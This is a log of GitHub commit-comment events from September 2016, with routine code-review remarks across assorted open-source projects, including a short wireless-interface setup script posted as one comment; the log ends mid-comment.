{"id":"4512942116","type":"CommitCommentEvent","actor":{"login":"stheno"},"repo":{"name":"Akkadius/EQEmuEOC"},"payload":{"comment":{"id":18891644,"position":null,"line":null,"path":null,"commit_id":"886b8682cd59dde8536fb8951984499d1f922206","created_at":"2016-09-04T00:02:37Z","updated_at":"2016-09-04T00:02:37Z","body":"Forgot to mention I increased the radius of the dial a touch and added a heading value readout"}},"created_at":"2016-09-04T00:02:37Z"}
{"id":"4512942620","type":"CommitCommentEvent","actor":{"login":"rtheunissen"},"repo":{"name":"php-ds/extension"},"payload":{"comment":{"id":18891645,"position":7,"line":136,"path":"src/ds/ds_htable.c","commit_id":"36b5151c91f34f92bd145e7c2fd105a5ad445966","created_at":"2016-09-04T00:03:17Z","updated_at":"2016-09-04T00:03:17Z","body":"Not at all, this was a mistake. `ds_htable_halve_capacity` was supposed to be replaced by `ds_htable_auto_truncate`. This was fixed shortly afterwards in 88b292fba1826a58cd5b40f1789348416a15242b."}},"created_at":"2016-09-04T00:03:17Z"}
{"id":"4512942780","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891646,"position":26,"line":26,"path":"add.go","commit_id":"0bf45cfd7e60c82a6c406576e9ff996ddaecabcf","created_at":"2016-09-04T00:03:26Z","updated_at":"2016-09-04T00:03:26Z","body":"`confict` -> `conflict` ;)"}},"created_at":"2016-09-04T00:03:26Z"}
{"id":"4512943756","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891652,"position":20,"line":20,"path":"cat.go","commit_id":"0bf45cfd7e60c82a6c406576e9ff996ddaecabcf","created_at":"2016-09-04T00:04:32Z","updated_at":"2016-09-04T00:04:32Z","body":"Use `\\n` for line breaks"}},"created_at":"2016-09-04T00:04:32Z"}
{"id":"4512946734","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891666,"position":80,"line":80,"path":"utils/crypto.go","commit_id":"0bf45cfd7e60c82a6c406576e9ff996ddaecabcf","created_at":"2016-09-04T00:08:01Z","updated_at":"2016-09-04T00:08:01Z","body":"Way too complicated :) Use something simple like this: https://github.com/strukturag/spreed-webrtc/blob/cafca134c70d9d9129d839d8c2dcb5578eedff4a/go/randomstring/randomstring.go#L47"}},"created_at":"2016-09-04T00:08:01Z"}
{"id":"4512947251","type":"CommitCommentEvent","actor":{"login":"con-f-use"},"repo":{"name":"cnlohr/esp82xx"},"payload":{"comment":{"id":18891667,"position":null,"line":null,"path":null,"commit_id":"bea34af93d5773b2298d168f105b4fc73b2c813f","created_at":"2016-09-04T00:08:32Z","updated_at":"2016-09-04T00:08:32Z","body":"I'd preserve the old behavior as a compile-time option..."}},"created_at":"2016-09-04T00:08:32Z"}
{"id":"4512948374","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18891669,"position":null,"line":null,"path":null,"commit_id":"a4623efaa67be1cfea19e561be83f118a784b9d1","created_at":"2016-09-04T00:09:50Z","updated_at":"2016-09-04T00:09:50Z","body":"Actually, this is 96f90381e3ed696861354ea4ddf4ac0c495031c5 follow up :P"}},"created_at":"2016-09-04T00:09:50Z"}
{"id":"4512949309","type":"CommitCommentEvent","actor":{"login":"srikanthsama"},"repo":{"name":"srikanthsama/Test-Magic"},"payload":{"comment":{"id":18891673,"position":null,"line":null,"path":null,"commit_id":"88db2a8b2b8a8adbbde0c4a788ce0a2838e65b60","created_at":"2016-09-04T00:10:50Z","updated_at":"2016-09-04T00:10:50Z","body":"Changes are made in cgUI.java File "}},"created_at":"2016-09-04T00:10:50Z"}
{"id":"4512950987","type":"CommitCommentEvent","actor":{"login":"ressec"},"repo":{"name":"ressec/Thot"},"payload":{"comment":{"id":18891677,"position":15,"line":25,"path":"thot/pom.xml","commit_id":"f7e58af1478555480071ae383546da3fab4501f5","created_at":"2016-09-04T00:12:43Z","updated_at":"2016-09-04T00:12:43Z","body":"Comment on this line."}},"created_at":"2016-09-04T00:12:43Z"}
{"id":"4512951677","type":"CommitCommentEvent","actor":{"login":"ressec"},"repo":{"name":"ressec/Thot"},"payload":{"comment":{"id":18891678,"position":15,"line":25,"path":"thot/pom.xml","commit_id":"f7e58af1478555480071ae383546da3fab4501f5","created_at":"2016-09-04T00:13:31Z","updated_at":"2016-09-04T00:13:31Z","body":"I agree."}},"created_at":"2016-09-04T00:13:31Z"}
{"id":"4512952093","type":"CommitCommentEvent","actor":{"login":"bndw"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891679,"position":26,"line":26,"path":"add.go","commit_id":"0bf45cfd7e60c82a6c406576e9ff996ddaecabcf","created_at":"2016-09-04T00:13:55Z","updated_at":"2016-09-04T00:13:55Z","body":"Welcome back ;)\r\n\r\nChanges incoming..."}},"created_at":"2016-09-04T00:13:55Z"}
{"id":"4512953352","type":"CommitCommentEvent","actor":{"login":"knkteja"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18891682,"position":35,"line":136,"path":"app.js","commit_id":"93c5661369a4533eef65b08654d4387f544ee5c9","created_at":"2016-09-04T00:15:17Z","updated_at":"2016-09-04T00:15:17Z","body":"Didn't you want to get rid of mandatory/optional roles by having a `min` along with `max` for each role?"}},"created_at":"2016-09-04T00:15:17Z"}
{"id":"4512957274","type":"CommitCommentEvent","actor":{"login":"knkteja"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18891685,"position":49,"line":54,"path":"utils/helper.js","commit_id":"93c5661369a4533eef65b08654d4387f544ee5c9","created_at":"2016-09-04T00:19:54Z","updated_at":"2016-09-04T00:19:54Z","body":"roleType unused and not passed, remove?"}},"created_at":"2016-09-04T00:19:54Z"}
{"id":"4512958969","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18891687,"position":null,"line":null,"path":null,"commit_id":"701366be4389cde90dd25b10410d000820e8ed54","created_at":"2016-09-04T00:21:43Z","updated_at":"2016-09-04T00:21:43Z","body":"Here is my attempt\r\nhttp://tests.stockfishchess.org/tests/view/57cb68dd0ebc59030fbe4e40"}},"created_at":"2016-09-04T00:21:43Z"}
{"id":"4512964099","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"alesaiko/kernel_msm"},"payload":{"comment":{"id":18891689,"position":null,"line":null,"path":null,"commit_id":"8b468160010cd8d104770cc9037e2ea108870937","created_at":"2016-09-04T00:27:34Z","updated_at":"2016-09-04T00:27:34Z","body":"Ah good call! And it doesn't break sound altogether like mine did?"}},"created_at":"2016-09-04T00:27:34Z"}
{"id":"4512964679","type":"CommitCommentEvent","actor":{"login":"knkteja"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18891690,"position":35,"line":136,"path":"app.js","commit_id":"93c5661369a4533eef65b08654d4387f544ee5c9","created_at":"2016-09-04T00:28:18Z","updated_at":"2016-09-04T00:28:18Z","body":"Is this the first step towards that?"}},"created_at":"2016-09-04T00:28:18Z"}
{"id":"4512964959","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18891692,"position":null,"line":null,"path":null,"commit_id":"2837defedc056775a9e3d473bc2f0ef01c1e02e7","created_at":"2016-09-04T00:28:39Z","updated_at":"2016-09-04T00:28:39Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BmIzI6C5&#x2F;3-ch-002-configure-server-env\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [CH-002] Configure server env</a>"}},"created_at":"2016-09-04T00:28:39Z"}
{"id":"4512965484","type":"CommitCommentEvent","actor":{"login":"akihikodaki"},"repo":{"name":"aquynh/capstone"},"payload":{"comment":{"id":18891693,"position":null,"line":null,"path":null,"commit_id":"5311ef224a96c66e498d01423ac76a8625e0242d","created_at":"2016-09-04T00:29:20Z","updated_at":"2016-09-04T00:29:20Z","body":"You removed `test.ml`!"}},"created_at":"2016-09-04T00:29:20Z"}
{"id":"4512967950","type":"CommitCommentEvent","actor":{"login":"mleanos"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18891697,"position":null,"line":null,"path":null,"commit_id":"7be191042066e58850899000ee02b6557d744c18","created_at":"2016-09-04T00:32:01Z","updated_at":"2016-09-04T00:32:01Z","body":"@hyperreality @lirantal I'm getting an error at the end of the coveralls run. Could this have been what was happening on the Travis builds with the PR?\r\n\r\n![gulp-coveralls-error](https://cloud.githubusercontent.com/assets/5613734/18228271/007afd7c-71fc-11e6-97f0-eadb7af1cb2c.PNG)\r\n\r\nIt looks like it's throwing an error with the client-side coverage."}},"created_at":"2016-09-04T00:32:01Z"}
{"id":"4512970061","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891704,"position":52,"line":87,"path":"utils/crypto.go","commit_id":"d0f1ce8a2c56040095942d239cd17ee4e6c52f83","created_at":"2016-09-04T00:34:07Z","updated_at":"2016-09-04T00:34:07Z","body":"The old character set is fine tough 😄\r\nDon't forget to add `\"`"}},"created_at":"2016-09-04T00:34:07Z"}
{"id":"4512971340","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891705,"position":69,"line":102,"path":"utils/crypto.go","commit_id":"d0f1ce8a2c56040095942d239cd17ee4e6c52f83","created_at":"2016-09-04T00:35:22Z","updated_at":"2016-09-04T00:35:22Z","body":"Hmm, do you really want to fall back to pseudo random?\r\nThis fallback should never happen, however I'd prefer to show an error message instead."}},"created_at":"2016-09-04T00:35:22Z"}
{"id":"4512971958","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18891707,"position":null,"line":null,"path":null,"commit_id":"7be191042066e58850899000ee02b6557d744c18","created_at":"2016-09-04T00:35:58Z","updated_at":"2016-09-04T00:35:58Z","body":"@mleanos Hi, thanks for looking into this issue. I think you're getting that error because you're missing a `.coveralls.yml` file with a personal repo token in it."}},"created_at":"2016-09-04T00:35:58Z"}
{"id":"4512973831","type":"CommitCommentEvent","actor":{"login":"bndw"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891711,"position":52,"line":87,"path":"utils/crypto.go","commit_id":"d0f1ce8a2c56040095942d239cd17ee4e6c52f83","created_at":"2016-09-04T00:37:55Z","updated_at":"2016-09-04T00:37:55Z","body":"I wasn't a fan of some of the punctuation in the old charset. \r\nDon't forget to a `\"` ?"}},"created_at":"2016-09-04T00:37:55Z"}
{"id":"4512974406","type":"CommitCommentEvent","actor":{"login":"mleanos"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18891715,"position":null,"line":null,"path":null,"commit_id":"7be191042066e58850899000ee02b6557d744c18","created_at":"2016-09-04T00:38:34Z","updated_at":"2016-09-04T00:38:34Z","body":"How do I get me one of them? :) And why is it required? If this can be automated, then we should look into adding a Gulp task to do this for the user. I would never have know, unless I dug deeper into Coveralls.\r\n"}},"created_at":"2016-09-04T00:38:34Z"}
{"id":"4512975052","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891718,"position":null,"line":null,"path":null,"commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T00:39:20Z","updated_at":"2016-09-04T00:39:20Z","body":"I love it! I'm glad that finally, after trying all these different strategies, I found something I like."}},"created_at":"2016-09-04T00:39:20Z"}
{"id":"4512975987","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891720,"position":73,"line":33,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T00:40:22Z","updated_at":"2016-09-04T00:40:22Z","body":"asdf"}},"created_at":"2016-09-04T00:40:22Z"}
{"id":"4512976453","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891721,"position":1,"line":1,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T00:40:53Z","updated_at":"2016-09-04T00:40:53Z","body":"a"}},"created_at":"2016-09-04T00:40:53Z"}
{"id":"4512977037","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891722,"position":1,"line":33,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T00:41:27Z","updated_at":"2016-09-04T00:41:27Z","body":"a"}},"created_at":"2016-09-04T00:41:27Z"}
{"id":"4512980938","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891724,"position":72,"line":44,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T00:45:47Z","updated_at":"2016-09-04T00:45:47Z","body":"Still need to fix the special characters in `\\chapter{}` getting replaced. I might perform the replacements on each chapter in the array first, then join (or [reduce](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce)?) them with the chapter command (`.join(\"\\\\chapter{}\"`). How would this affect code readability and performance?"}},"created_at":"2016-09-04T00:45:47Z"}
{"id":"4512981774","type":"CommitCommentEvent","actor":{"login":"NPCTheSBest"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18891725,"position":null,"line":null,"path":null,"commit_id":"be5721d4dbc3def77a7e28e5d2d5b2de1805d45f","created_at":"2016-09-04T00:46:49Z","updated_at":"2016-09-04T00:46:49Z","body":"After all actually, the ones use UILib would feel like \"我能看得懂你写的代码，但这TM到底是干啥玩意用的？？？\"."}},"created_at":"2016-09-04T00:46:49Z"}
{"id":"4512981824","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18891726,"position":null,"line":null,"path":null,"commit_id":"7be191042066e58850899000ee02b6557d744c18","created_at":"2016-09-04T00:46:52Z","updated_at":"2016-09-04T00:46:52Z","body":"@mleanos Good point. Perhaps we should split this into two separate gulp tasks then, one which simply runs the coverage locally and one which additionally submits the results to coveralls.io?"}},"created_at":"2016-09-04T00:46:52Z"}
{"id":"4512982331","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891727,"position":79,"line":51,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T00:47:31Z","updated_at":"2016-09-04T00:47:31Z","body":"Even though JavaScript doesn't have the syntax for multiple keys to one value, this isn't too bad to read. Many of these are in pairs. It's would be nice to group them together, but it's not bad to read when they're next to each other."}},"created_at":"2016-09-04T00:47:31Z"}
{"id":"4512984733","type":"CommitCommentEvent","actor":{"login":"mleanos"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18891729,"position":null,"line":null,"path":null,"commit_id":"7be191042066e58850899000ee02b6557d744c18","created_at":"2016-09-04T00:50:06Z","updated_at":"2016-09-04T00:50:06Z","body":"Yes. That's a good idea. We should make it configurable, so that a user can easily opt in/out of this functionality.\r\n"}},"created_at":"2016-09-04T00:50:06Z"}
{"id":"4512986058","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18891730,"position":null,"line":null,"path":null,"commit_id":"70ebd6dbcbd9fee23767cdcb0cb581665f977b81","created_at":"2016-09-04T00:51:26Z","updated_at":"2016-09-04T00:51:26Z","body":"Thanks, I didn't even notice :/"}},"created_at":"2016-09-04T00:51:26Z"}
{"id":"4512986857","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891731,"position":98,"line":70,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T00:52:18Z","updated_at":"2016-09-04T00:52:18Z","body":"Previously considered: \r\n\r\n    for (var e in Object.keys(simpleReplacements)) {\r\n      replacements[e] = { match: e,\r\n                        replace: simpleReplacements[e] };\r\n    }"}},"created_at":"2016-09-04T00:52:18Z"}
{"id":"4512987257","type":"CommitCommentEvent","actor":{"login":"Kashomon"},"repo":{"name":"usgo/online-ratings"},"payload":{"comment":{"id":18891732,"position":14,"line":34,"path":"web/app/forms.py","commit_id":"1c519364c45cf92ffb77a33a0c744465df4bd5b0","created_at":"2016-09-04T00:52:42Z","updated_at":"2016-09-04T00:52:42Z","body":"nit: seems like this should be optional."}},"created_at":"2016-09-04T00:52:42Z"}
{"id":"4512987477","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891733,"position":107,"line":79,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T00:52:58Z","updated_at":"2016-09-04T00:52:58Z","body":"Previously considered:\r\n\r\n    var quotesReplacements = [\r\n      /\"([^\"]+)\"/g: [\"``\",\"''\"], // yes you can use regex literals as values, awesome\r\n      /\\B'(.+)'\\B/g: [\"`\",\"'\"]\r\n    ]\r\n    var quotesReplaceRegex = new RegExp(Object.keys(quotesReplacements).join(\"|\"),\"g\");\r\n    chapters = chapters.replace(quotesReplaceRegex, function(match, $1) {\r\n      return quotesReplacements[...] + $1 + quotesReplacements[...];\r\n    });"}},"created_at":"2016-09-04T00:52:58Z"}
{"id":"4512987972","type":"CommitCommentEvent","actor":{"login":"Kashomon"},"repo":{"name":"usgo/online-ratings"},"payload":{"comment":{"id":18891734,"position":36,"line":96,"path":"web/app/tournament/tourny.py","commit_id":"1c519364c45cf92ffb77a33a0c744465df4bd5b0","created_at":"2016-09-04T00:53:33Z","updated_at":"2016-09-04T00:53:33Z","body":"Ah. good catch. We wouldn't want to add players when tournaments are submitted."}},"created_at":"2016-09-04T00:53:33Z"}
{"id":"4512989691","type":"CommitCommentEvent","actor":{"login":"neoaero99"},"repo":{"name":"skuhl/RobotRun"},"payload":{"comment":{"id":18891736,"position":null,"line":null,"path":null,"commit_id":"5030518bef4c75822fc922ee1c659881f22ed944","created_at":"2016-09-04T00:55:33Z","updated_at":"2016-09-04T00:55:33Z","body":"It may be a little late to convert to a Quaternion class, but I hope it will come in handy."}},"created_at":"2016-09-04T00:55:33Z"}
{"id":"4512989814","type":"CommitCommentEvent","actor":{"login":"Kashomon"},"repo":{"name":"usgo/online-ratings"},"payload":{"comment":{"id":18891737,"position":12,"line":33,"path":"web/app/forms.py","commit_id":"1c519364c45cf92ffb77a33a0c744465df4bd5b0","created_at":"2016-09-04T00:55:42Z","updated_at":"2016-09-04T00:55:42Z","body":"Probably the Director field should be a link back to a User in the Online Ratings database, but we can come back and clean this up.\r\n\r\nNote: It's ok to break some of the tournament assumptions, because it didn't assume being able to connect to a database of players. It assumed that you needed to send everything asynchronously."}},"created_at":"2016-09-04T00:55:42Z"}
{"id":"4512990281","type":"CommitCommentEvent","actor":{"login":"bndw"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891739,"position":69,"line":102,"path":"utils/crypto.go","commit_id":"d0f1ce8a2c56040095942d239cd17ee4e6c52f83","created_at":"2016-09-04T00:56:14Z","updated_at":"2016-09-04T00:56:14Z","body":"@leonklingele You raise a good point. I decided to fall back to the PRNG due to the assumption that a randomly generated password of a decent length is likely better than a user generated one. However, that's extremely subjective and probably not an assumption I should force on a user. Further, doing so silently is essentially swallowing the error. \r\n\r\nI'll raise the error 😄 "}},"created_at":"2016-09-04T00:56:14Z"}
{"id":"4512990494","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"caitp/TwitchSwitcher"},"payload":{"comment":{"id":18891740,"position":null,"line":null,"path":null,"commit_id":"50990403602f53972ee27a94f4370fb98cfa4df5","created_at":"2016-09-04T00:56:32Z","updated_at":"2016-09-04T00:56:32Z","body":"I guess the old version _did_ have CRLF endings, as expected. What a relief."}},"created_at":"2016-09-04T00:56:32Z"}
{"id":"4512991780","type":"CommitCommentEvent","actor":{"login":"iceberg20"},"repo":{"name":"iceberg20/ZSSN"},"payload":{"comment":{"id":18891742,"position":null,"line":null,"path":null,"commit_id":"5934d4432cecd23d613f5d132931dca44fc4f89e","created_at":"2016-09-04T00:58:14Z","updated_at":"2016-09-04T00:58:14Z","body":"API Documentation"}},"created_at":"2016-09-04T00:58:14Z"}
{"id":"4512992049","type":"CommitCommentEvent","actor":{"login":"usui-kazuki"},"repo":{"name":"usui-kazuki/ToDoList"},"payload":{"comment":{"id":18891743,"position":null,"line":null,"path":null,"commit_id":"fc50db0f3b1808c0e1bf47477c8920f2b98f13f7","created_at":"2016-09-04T00:58:37Z","updated_at":"2016-09-04T00:58:37Z","body":"https://gentle-garden-71463.herokuapp.com/tasks/\r\n"}},"created_at":"2016-09-04T00:58:37Z"}
{"id":"4512992240","type":"CommitCommentEvent","actor":{"login":"EdwardRamos2"},"repo":{"name":"EdwardRamos2/42w"},"payload":{"comment":{"id":18891744,"position":2,"line":2,"path":"README.md","commit_id":"499fef6293718152654de2859c9d3a7923e7b0c2","created_at":"2016-09-04T00:58:52Z","updated_at":"2016-09-04T00:58:52Z","body":"# 42w \r\n# Version 0.1.0 \r\n# Edward Ramos\r\n# https://github.com/EdwardRamos2/42w\r\n\r\nprint (\"42w\")\r\nprint (\"Version 0.1.0\")\r\nprint (\"Edward Ramos\")\r\nprint (\"https://github.com/EdwardRamos2/42w/\")\r\nimport os\r\n\r\nprint (\"MENU\")\r\nopcao1 = (raw_input(\"ENTER (1) - PARA VERFICAR INTERFACES:  \"))\r\n\r\nif opcao1.upper() == '1':\r\n onl = os.system(\"iw dev\")\r\n print onl\r\n\r\n\r\nopcao2 = (raw_input(\"ENTER (2) - check PROCESSOS ATIVOS:  \"))\r\nif opcao2.upper() == '2':\r\n\tfina = os.system(\"airmon-ng check\")\r\n\tprint fina\r\n\t\r\nopcao3 = (raw_input(\"ENTER (3) - kill PROCESSOS ATIVOS:  \"))\r\nif opcao3.upper() == '3':\r\n\tmorte = os.system(\"airmon-ng check kill\")\t\r\n\tprint morte\r\n\r\nopcao4 = (raw_input(\"DIGITE NOME SUA  INTERFACE: \"))\r\nprint (\"wlan1 e wlan0 aceitos\")\r\n#face = (raw_input(\"ENTER NOME DE SUA INTERFACE\"))\r\nif opcao4 == 'wlan1':\r\n\tuppp = os.system(\"ifconfig wlan1 up\")\r\n\tprint uppp\r\nelif opcao4 == 'wlan0':\r\n\tuppp2 = os.system(\"ifconfig wlan0 up\")\r\n\tprint uppp2\t\r\n\r\nlistar2 = os.system(\"ifconfig\")\t\r\nprint listar2\r\n\r\nsair = (raw_input(\"ENTER (5) - PARA SAIR:  \"))\r\n \r\nif sair.upper() == '5':\r\n\tprint (\"Saindo em 3.2.1\")\r\n\texit\r\nelse:\r\n\tprint (\"error, digite o valor solicitado :)\")\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-04T00:58:52Z"}
{"id":"4512995492","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891746,"position":109,"line":81,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T01:02:13Z","updated_at":"2016-09-04T01:02:13Z","body":"I had perviously ([[1](https://github.com/sethten/ficbot/commit/2764e48d34ded73ef5c591c1ed2da810a6632e45#diff-682dc7550d1ab90656e54f0c14674f9fR53)], [[2](https://github.com/sethten/ficbot/commit/081def453435d82259d5e05f7bf362ed9722c6ea#diff-f9b12bd72f40c9b8ed144484f0f12a5fR88)], [[3](https://github.com/sethten/ficbot/commit/675e6a1d0aa671ccf0b3abb530ee7afee1c7d9cf)]) used `undefined` to ignore the first parameter of the `.replace` callback, the matched string. It might be better practice to give it a short name, so here is borrowing from Python. (Luckily I'm not using [underscore](http://underscorejs.org/)!)"}},"created_at":"2016-09-04T01:02:13Z"}
{"id":"4512995901","type":"CommitCommentEvent","actor":{"login":"fsst1998"},"repo":{"name":"fsst1998/ToDoList"},"payload":{"comment":{"id":18891747,"position":null,"line":null,"path":null,"commit_id":"2458006a1c095f65afced0c165fdd7ecef80a375","created_at":"2016-09-04T01:02:40Z","updated_at":"2016-09-04T01:02:40Z","body":"https://still-reaches-96558.herokuapp.com/tasks"}},"created_at":"2016-09-04T01:02:40Z"}
{"id":"4512996303","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18891748,"position":null,"line":null,"path":null,"commit_id":"7be191042066e58850899000ee02b6557d744c18","created_at":"2016-09-04T01:03:08Z","updated_at":"2016-09-04T01:03:08Z","body":"Okay, should be a quick fix. I'll also look closer into the issue with client-side coverage, perhaps as @lirantal says it's to do with the .travis.yml file."}},"created_at":"2016-09-04T01:03:08Z"}
{"id":"4512997564","type":"CommitCommentEvent","actor":{"login":"knkteja"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18891749,"position":null,"line":null,"path":null,"commit_id":"c5f68ce48b4e2fe573a88efc011923d3203a9dfa","created_at":"2016-09-04T01:04:28Z","updated_at":"2016-09-04T01:04:28Z","body":"Yet to update the tests. Trying to get them running on idea."}},"created_at":"2016-09-04T01:04:28Z"}
{"id":"4512998006","type":"CommitCommentEvent","actor":{"login":"eliapplethetech"},"repo":{"name":"nova-cloud/nova-api"},"payload":{"comment":{"id":18891750,"position":null,"line":null,"path":null,"commit_id":"15173d58298cdb43f2d00296383551d1b650efbf","created_at":"2016-09-04T01:04:57Z","updated_at":"2016-09-04T01:04:57Z","body":"that saved us a bunch"}},"created_at":"2016-09-04T01:04:57Z"}
{"id":"4512998960","type":"CommitCommentEvent","actor":{"login":"Fasngtao"},"repo":{"name":"Fasngtao/my-model"},"payload":{"comment":{"id":18891751,"position":null,"line":null,"path":null,"commit_id":"d443fd8d89fb59e16f96a6ea3aecc5836da7eccc","created_at":"2016-09-04T01:06:01Z","updated_at":"2016-09-04T01:06:01Z","body":"the calculation has been done"}},"created_at":"2016-09-04T01:06:01Z"}
{"id":"4512999119","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891752,"position":106,"line":78,"path":"ficbot.js","commit_id":"60e4938804cdf0aad27d526b79962d5cf63c305e","created_at":"2016-09-04T01:06:14Z","updated_at":"2016-09-04T01:06:14Z","body":"Notice no need for a callback in the replace call here, a simple string will do."}},"created_at":"2016-09-04T01:06:14Z"}
{"id":"4513000348","type":"CommitCommentEvent","actor":{"login":"KingRaptor"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":18891756,"position":4,"line":122,"path":"Fixer/WikiPortingMW.cs","commit_id":"414b989850cfbdf7ec0442c1b6fd35d3f95cd732","created_at":"2016-09-04T01:07:31Z","updated_at":"2016-09-04T01:07:31Z","body":"Comment is rather misleading yeah, but I think it did remind me to not commit my actual password at least once.\r\n\r\n[(for those who don't get the reference)](https://xkcd.com/936/)"}},"created_at":"2016-09-04T01:07:31Z"}
{"id":"4513001154","type":"CommitCommentEvent","actor":{"login":"rsudip90"},"repo":{"name":"rsudip90/toppr-challange"},"payload":{"comment":{"id":18891759,"position":null,"line":null,"path":null,"commit_id":"c66253ae3ec81512096b71ab421f3a7e1a20a963","created_at":"2016-09-04T01:08:27Z","updated_at":"2016-09-04T01:08:27Z","body":"http://stackoverflow.com/questions/31030307/why-is-pymongo-3-giving-serverselectiontimeouterror"}},"created_at":"2016-09-04T01:08:27Z"}
{"id":"4513001263","type":"CommitCommentEvent","actor":{"login":"kjohnson"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18891760,"position":null,"line":null,"path":null,"commit_id":"cf9e5274eb53f32d459f0f17342d7d1a2f222f66","created_at":"2016-09-04T01:08:37Z","updated_at":"2016-09-04T01:08:37Z","body":"Whoops, tagged the wrong issue.\r\nCloses wpninjas/ninja-forms-layout-styles#55"}},"created_at":"2016-09-04T01:08:37Z"}
{"id":"4513001462","type":"CommitCommentEvent","actor":{"login":"alexluecke"},"repo":{"name":"alexluecke/article-slideshow"},"payload":{"comment":{"id":18891762,"position":11,"line":112,"path":"article-slideshow.js","commit_id":"9cf7951f0429bc4a2f498ff89111ed248ecf9e76","created_at":"2016-09-04T01:08:49Z","updated_at":"2016-09-04T01:08:49Z","body":"This line broke things. Needs to be `'item': '.item'`."}},"created_at":"2016-09-04T01:08:49Z"}
{"id":"4513001884","type":"CommitCommentEvent","actor":{"login":"thinkyhead"},"repo":{"name":"thinkyhead/Marlin"},"payload":{"comment":{"id":18891764,"position":null,"line":null,"path":null,"commit_id":"f36d6810ad811a042a4d3b71211420eac3db728a","created_at":"2016-09-04T01:09:21Z","updated_at":"2016-09-04T01:09:21Z","body":"@Roxy-3D Ahead of our hangout, take a look at these changes and see that they make sense. I've had one tester look at this so far and he has reported positive results. The long-ish comment I brainstormed recently concerning how the center of the print area could probably be used as the fulcrum in all cases is also interesting, but it still includes the changes made here.\r\n\r\nI've been working on leveling for the MakerArm over the last couple of days, and in that case the stepper positions don't represent millimeters at all, but degrees of rotation. So that work is starting to expose some weaknesses in our assumptions. Or at least, it's exposing the fact that SCARA needs a bit of extra work to deal with that difference in coordinates, and will likely lead to conditionals scattered here and there throughout the relevant portions of Marlin.\r\n\r\nWe can discuss all that and more. I guess we're all taking the 